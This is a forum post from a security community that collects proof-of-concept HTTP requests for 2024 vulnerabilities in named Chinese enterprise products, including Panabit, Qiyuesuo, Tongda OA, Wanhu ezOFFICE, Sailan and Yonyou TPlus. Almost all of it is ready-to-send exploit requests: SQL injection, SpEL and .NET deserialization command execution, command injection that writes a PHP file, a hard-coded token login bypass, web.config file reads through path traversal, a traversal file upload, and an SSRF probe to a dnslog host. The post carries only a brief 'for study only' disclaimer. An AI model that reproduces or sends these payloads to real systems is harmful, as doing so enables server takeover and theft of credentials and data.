DecoyMini Technical Exchange Community

[2024] PoC Roundup (Part 2)

Forum Admin

Posted on 2024-8-16 10:35:30

The content of this post was collected from the internet. It must not be used for illegal purposes and is for study only!

Beijing Paiwang Software Co., Ltd. (北京派网软件有限公司) Panabit-Panalog big data log audit system: SQL injection vulnerability in sprog_upstatus.php

  GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
  Host:
  Accept-Encoding: gzip, deflate, br, zstd
  Accept-Language: zh-CN,zh;q=0.9
  Cache-Control: max-age=0
  Connection: keep-alive
  Cookie: PHPSESSID=f8la8ttr74fkge0pttpc626p45

Qiyuesuo (契约锁) electronic signature platform: remote command execution vulnerability in ukeysign

  POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
  Content-Type: application/json

  {"id":"2","params":[{"expression":"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='base64 encoding of the SpEL expression';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a.parseExpression(deStr);c.getValue();"}]}

Renwoxing (任我行) collaborative CRM system: deserialization vulnerability in UploadFile

  POST /SystemManage/UploadFile HTTP/1.1
  Host: {{Hostname}}
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded

  photoInfo={
  '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{
  '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd', '/c whoami']
  },'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
  }

Raisecom (瑞斯康达) multi-service intelligent gateway: RCE

  GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate, br
  Connection: close

Sailan (赛蓝) enterprise management system: arbitrary account login vulnerability in the AuthToken interface

  GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1
  Host:

Sailan (赛蓝) enterprise management system: arbitrary file read vulnerability in GetJSFile

  GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
  Connection: close

Sailan (赛蓝) enterprise management system: arbitrary file read vulnerability in ReadTxtLog

  GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1
  Host:
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Cookie: __RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJGXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1; ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl
  Priority: u=0, i
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Upgrade-Insecure-Requests: 1

Shenlan (深澜) billing management system: bind-ip remote code execution vulnerability (XVE-2024-18750)

  POST /strategy/ip/bind-ip HTTP/2
  Host:
  Content-Type: application/x-www-form-urlencoded

  data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B

TRS (拓尔思) media asset management system: file upload vulnerability in uploadThumb

  POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1
  Accept: */*
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

  ------WebKitFormBoundarySl8siBbmVicABvTX
  Content-Disposition: form-data; name="file"; filename="%2e%2e%2fwebapps%2fmas%2fa%2etxt"
  Content-Type: application/octet-stream

  1234
  ------WebKitFormBoundarySl8siBbmVicABvTX--

Tianwen (天问) property management ERP system: arbitrary file read vulnerability in ContractDownLoad

  GET /HM/M_Main/InformationManage/ContractDownLoad.aspx?ContractFile=../web.config HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Connection: close

Tianwen (天问) property management ERP system: arbitrary file read vulnerability in OwnerVacantDownLoad

  GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Connection: close

Tianwen (天问) property management ERP system: arbitrary file read vulnerability in VacantDiscountDownLoad

  GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Connection: close

Tongda OA V11.10: SQL injection vulnerability in the login.php interface

  POST /ispirit/interface/login.php HTTP/1.1
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Host:
  Content-Length: 107

  name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1%3d0,1,(select+~0%2b1))+limit+0,1))--+'

Wanhu (万户) ezOFFICE collaborative management platform: SQL injection vulnerability in getAutoCode (XVE-2024-18749)

  GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
  Host:

Yonyou Chanjet (用友畅捷通) TPlus system: SSRF vulnerability in the ajaxpro interface

  POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate
  Connection: close
  Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
  Upgrade-Insecure-Requests: 1
  Priority: u=0, i
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 36

  {
    "address":"ftlhbc.dnslog.cn"
  }
